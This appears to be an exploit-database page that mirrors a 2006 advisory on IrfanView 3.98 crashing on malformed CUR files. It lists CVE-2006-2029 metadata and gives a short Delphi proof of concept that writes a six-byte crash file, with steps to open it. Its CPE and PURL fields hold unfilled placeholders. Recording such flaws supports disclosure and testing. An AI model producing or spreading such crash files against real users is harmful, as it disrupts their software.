Advertisement






InfanView 3.98 (with plugins) - Access violation at processing images CUR files

CVE Category Price Severity
CVE-2006-2029 CWE-119 Not disclosed High
Author Risk Exploitation Type Date
Note High Local 2006-08-25
CPE PURL
cpe:<CPE (Common Platform Enumeration) URI string associated with the exploit> pkg:<PURL package manager url associated with the exploit>
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080123

Below is a copy:

Example (in Delphi):

===============cur.dpr===============

program cur;

{$APPTYPE CONSOLE}

const

FileName='file.cur';

Len=6;

Buf=#$00#$00#$01#$00#$00#$00;

var

F:File;

begin

AssignFile(F,FileName);

Rewrite(F,1);

BlockWrite(F,Buf,Len);

CloseFile(F);

end.

===============cur.dpr===============

1) Compile and Run "cur.dpr" with Delphi

2) Open "file.cur" with InfanView

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum